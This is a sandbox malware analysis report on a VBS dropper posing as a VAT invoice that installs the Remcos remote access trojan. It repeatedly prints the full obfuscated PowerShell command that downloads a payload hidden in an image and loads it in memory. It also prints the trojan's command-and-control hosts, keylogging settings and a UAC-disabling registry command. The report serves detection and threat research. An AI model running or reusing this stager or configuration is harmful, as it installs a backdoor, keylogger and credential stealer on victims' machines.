Windows Analysis Report
LbtytfWpvx.vbs

Overview

General Information

Sample name: LbtytfWpvx.vbs (renamed because original name is a hash value)
Original sample name: 4dd53bc42716f9abe36ae85c8ca8ea4b_m_Factura de IVA,pdf.vbs
Analysis ID: 1578245
MD5: 4dd53bc42716f9abe36ae85c8ca8ea4b
SHA1: aa44fc15455a5283e6596a4da7ee87ac4e4b8901
SHA256: d2256247fae569fdaf99ce1a41dc036c5e4ca7b637a52314f51b726e39096573
Tags: vbs, user-adrian__luca

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Command shell drops VBS files
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Potential malicious VBS script found (suspicious strings)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7272 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7320 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7804 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\talpe.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 8040 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • MSBuild.exe (PID: 8048 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • wscript.exe (PID: 2084 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • wscript.exe (PID: 7860 cmdline: wscript.exe C:\ProgramData\talpe.vbs MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7908 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 7060 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • MSBuild.exe (PID: 6800 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["rem.pushswroller.eu:23101:1", "firewarzone.ydns.eu:23101:1", "dim.remofficialws.top:23101:1", "rem.officialswvrem.top:23101:1"], "Assigned name": "NW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmcghdzxtrswtwg-BJ2KPV", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
0000000C.00000002.2262032025.0000000002D6F000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000000F.00000002.3171710253.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000000C.00000002.2256274079.0000000000F98000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
Source | Rule | Description | Author | Strings
12.2.MSBuild.exe.400000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
12.2.MSBuild.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
12.2.MSBuild.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
12.2.MSBuild.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown | strings:
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
12.2.MSBuild.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown | strings:
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]
Source | Rule | Description | Author | Strings
amsi64_7320.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_7908.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

System Summary

                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = 
[System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7272, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetSt
                        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = 
[System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7272, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetSt
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = 
[System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7272, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetSt
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentProcessId: 8048, ParentProcessName: MSBuild.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs" , ProcessId: 2084, ProcessName: wscript.exe
                        Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 178.237.33.50, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 8048, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49740
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentProcessId: 8048, ParentProcessName: MSBuild.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs" , ProcessId: 2084, ProcessName: wscript.exe
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", ProcessId: 7272, ProcessName: wscript.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\talpe.vbs", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\talpe.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7320, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\talpe.vbs", ProcessId: 7804, ProcessName: cmd.exe
                        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored 
